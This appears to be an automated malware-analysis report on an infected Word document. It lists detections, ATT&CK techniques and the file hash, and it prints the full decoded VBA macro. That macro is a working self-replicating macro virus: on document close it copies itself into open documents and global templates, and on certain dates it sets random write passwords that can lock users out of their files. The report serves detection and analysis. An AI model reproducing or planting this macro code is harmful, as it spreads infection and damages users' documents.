Verdict: MALICIOUS
Risk Score: 200

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1547.001 Registry Run Keys / Startup Folder
The sample is a malicious Office document containing VBA macros. The critical heuristic 'OLE_VBA_MACRO_VIRUS_REPLICATION' indicates that the macros attempt to self-replicate by writing their code into other documents. This behavior is characteristic of macro-based malware designed for propagation. No specific family could be identified, but the replication mechanism is a key indicator of malicious intent.
Heuristics (3)

- ClamAV: Doc.Trojan.Title-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Title-1
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- VBA macro-virus self-replication / AV tampering (critical, OLE_VBA_MACRO_VIRUS_REPLICATION): VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature. Matched line in script: `currcomp.CodeModule.AddFromString thecode.lines(mystart, mylines)`
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9226 bytes |

SHA-256: 0c649edc63425f8d90aac31eabebcfd5703ab0007a65f97d4b776d5a681a9836

Detection:
- ClamAV: Doc.Trojan.Title-1
- Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Close()
On Error Resume Next
If Left(Me.BuiltInDocumentProperties("Title"), 1) = "?" Then
Me.BuiltInDocumentProperties("Title") = Mid(Me.BuiltInDocumentProperties("Title"), 2)
Exit Sub
End If
Me.BuiltInDocumentProperties("Title") = "?" & Me.BuiltInDocumentProperties("Title")
Dim currdoc As Document
Dim thecode As Object
Dim currcomp As Object
Set thecode = Me.VBProject.VBComponents.Item(Me.CodeName).CodeModule
Dim lines As Integer, mystart As Integer
mystart = thecode.ProcBodyLine("Document_Close", vbext_pk_Proc)
mylines = thecode.ProcCountLines("Document_Close", vbext_pk_Proc) - mystart + 1
Dim savy As Boolean
' Options.VirusProtection =
For Each currdoc In Documents
savy = currdoc.Saved
If currdoc.SaveFormat = wdFormatDocument Or currdoc.SaveFormat = wdFormatTemplate Then
Set currcomp = currdoc.VBProject.VBComponents.Item(1)
If Not currcomp.CodeModule.Find("wsxzaqedc", 1, 1, 100000, 100000) Then
If Not currcomp.CodeModule.Find("Document_Close", 1, 1, 100000, 100000) Then
currcomp.CodeModule.AddFromString thecode.lines(mystart, mylines)
Else
currcomp.CodeModule.InsertLines currcomp.CodeModule.ProcBodyLine("Document_Close", vbext_pk_Proc) + 1, thecode.lines(mystart + 1, mylines - 2)
End If
If savy Then currdoc.Save
End If
If (Day(Now()) = 30 And Month(Now()) = 7) Or (Day(Now()) = 20 And Month(Now()) = 6) Or (Day(Now()) = 3 And Month(Now()) = 5) Then
currdoc.WritePassword = Str(Int(Rnd() * 10) - 1)
If savy Then currdoc.Save
End If
End If
Next currdoc
Dim currtemp As Template
Dim code As String
For Each currtemp In Templates
savy = currtemp.Saved
Set currcomp = currtemp.VBProject.VBComponents.Item(1)
If Not currcomp.CodeModule.Find("wsxzaqedc", 1, 1, 100000, 100000) Then
If Not currcomp.CodeModule.Find("Document_Close", 1, 1, 100000, 100000) Then
code = thecode.lines(mystart, mylines)
currcomp.CodeModule.AddFromString code
Else
code = thecode.lines(mystart + 1, mylines - 2)
currcomp.CodeModule.InsertLines currcomp.CodeModule.ProcBodyLine("Document_Close", vbext_pk_Proc) + 1, code
End If
If savy Then currtemp.Save
End If
Next currtemp
Me.BuiltInDocumentProperties("Title") = Mid(Me.BuiltInDocumentProperties("Title"), 2)
End Sub
' Processing file: /opt/analyzer/scan_staging/b36685d991c748b78c94c80c417b6216.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 8729 bytes
```